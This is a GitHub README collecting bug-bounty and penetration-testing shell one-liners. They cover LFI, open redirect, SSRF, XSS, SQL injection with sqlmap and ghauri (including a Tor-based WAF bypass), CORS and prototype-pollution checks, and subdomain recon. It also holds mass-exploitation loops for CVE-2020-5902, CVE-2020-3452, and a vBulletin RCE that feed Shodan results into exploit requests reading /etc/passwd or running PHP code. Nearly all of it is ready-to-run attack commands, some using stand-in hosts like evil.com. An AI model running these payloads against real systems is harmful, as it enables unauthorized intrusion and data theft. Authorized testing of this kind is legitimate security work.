Skip to content

00xZ/One_Liners

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

🔥 Bug Bounty One-Liners Collection

A curated list of recon & vulnerability hunting one-liners for bug bounty, pentesting, and automation.

bash status license


📌 Table of Contents


📂 LFI

cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

🔁 Open Redirect

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host; do curl -s -L "$host" -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n"; done
cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'

🌐 SSRF

cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr

💥 XSS

Knoxss Mass Scan

file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file

Reflected XSS

cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"
cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31mVulnerable"; done

🗄 SQL Injection

cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done

Loop through potentially vulnriable SQLi file and show exploited ones to file

cat maybe_vuln_to_sqli.txt | while read -r url; do 
  ghauri -u "$url" --batch --dbs 2>/dev/null | grep -qi "available databases" && echo "$url"; 
done | anew /root/nucleye/output/confirmed_sqli.txt

WAF Bypass (TOR)

sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment

📁 Hidden Directories

dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -o output.txt
ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json

Extract URLs from ffuf JSON

cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txt

🧾 Sensitive Files (Wayback)

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -E ".xls|\.xml|\.json|\.pdf|\.sql|\.docx|\.zip|\.tar.gz|\.bak|\.7z|\.rar"

🌍 CORS

echo target.com | (gau || hakrawler || waybackurls || katana) | while read url; do curl -s -I -H "Origin: https://evil.com" "$url" | grep 'https://evil.com' && echo "[VULN] $url"; done

🧪 Prototype Pollution

subfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | grep "VULNERABLE"

📜 JavaScript Analysis

Find JS Files

cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i "\.js" | egrep -v "\.json|\.jsp" | anew js.txt

Extract Endpoints

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed 's/^"//' | sed 's/"$//' | sort -u

🧩 SSTI

for url in $(cat targets.txt); do python3 tplmap.py -u $url; done

⚙️ Misc

Shodan Scan

cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0

Nuclei Screenshots

nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v

Nmap CIDR → IPs

cat cidr.txt | xargs -I @ sh -c 'nmap -sn @ | grep "Nmap scan report" | sed "s/Nmap scan report for //g"' | anew nmap-ips.txt

Download JS Files

mkdir -p js_files; while read -r url; do curl -sSL "$url" -o "js_files/$(basename "$url")"; done < js.txt

Prototype Pollution (@R0X4R)

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

CVE-2020-5902 (@Madrobot_)

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do
curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root &&
printf "$host Vulnerable\n" ||
printf "$host Not Vulnerable\n"
done

CVE-2020-3452 (@vict0ni)

while read LINE; do
curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" |
head | grep -q "Cisco" &&
echo "[VULNERABLE] $LINE" ||
echo "[NOT VULNERABLE] $LINE"
done < HOSTS.txt

CVE-2022-0378 (@7h3h4ckv157)

cat URLS.txt | while read h; do
curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x" |
grep -qs "onmouse" && echo "$h: VULNERABLE"
done

vBulletin RCE (@Madrobot_)

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do
curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel \
-d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' |
grep -q phpinfo &&
echo "$host VULNERABLE" ||
echo "$host Not Vulnerable"
done

Find JavaScript Files (@D0cK3rG33k)

assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpg|.svg|.gif)' | while read url; do
curl -s $url | grep -Eo "var [a-zA-Z0-9_]+"
done

Extract Endpoints from JS (@renniepak)

cat FILE.js | grep -oh '"/[a-zA-Z0-9_/?=&]*"' | sed 's/"//g' | sort -u

Get CIDR & Org Info (@steve_mcilwain)

for HOST in $(cat HOSTS.txt); do
for ip in $(dig a $HOST +short); do
whois $ip | grep -e "CIDR\|Organization"
done
done

RapidDNS Subdomains

export host="HOST"
curl -s "https://rapiddns.io/subdomain/$host?full=1" | grep "$host" | sort -u

BufferOver Subdomains

curl -s https://dns.bufferover.run/dns?q=.HOST | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u

TLS BufferOver Subdomains

export domain="HOST"
curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results[] | rev | cut -d ',' -f1 | rev | sort -u

Riddler Subdomains

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

VirusTotal Subdomains

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

CertSpotter Subdomains

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" |
jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Archive Subdomains

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" |
sed 's_https*://__' | cut -d/ -f1 | sort -u

FFUF Bruteforce

ffuf -u https://FUZZ.HOST -w FILE.txt -v

Extract IPs

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' file.txt

Ports Scan without Cloudflare

subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Subdomain Takeover

subfinder -d HOST >> FILE
assetfinder --subs-only HOST >> FILE
amass enum -d HOST >> FILE
subjack -w FILE

Sitemap Extractor

curl -s http://HOST/sitemap.xml | grep loc | sed 's/<[^>]*>//g'

XSS via Wayback

waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read url; do
curl -sk "$url" | grep alert
done

CORS Misconfiguration Check

gau URL | while read url; do
curl -sIH "Origin: https://evil.com" $url | grep evil.com
done

Nmap + HTTPX Pipeline

nmap -oX - HOST | jq | httpx

⚠️ Disclaimer

This is for educational and authorized testing only.


⭐ Contribute

PRs welcome 🔥

About

All my favorite one liner's for bug bounty

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages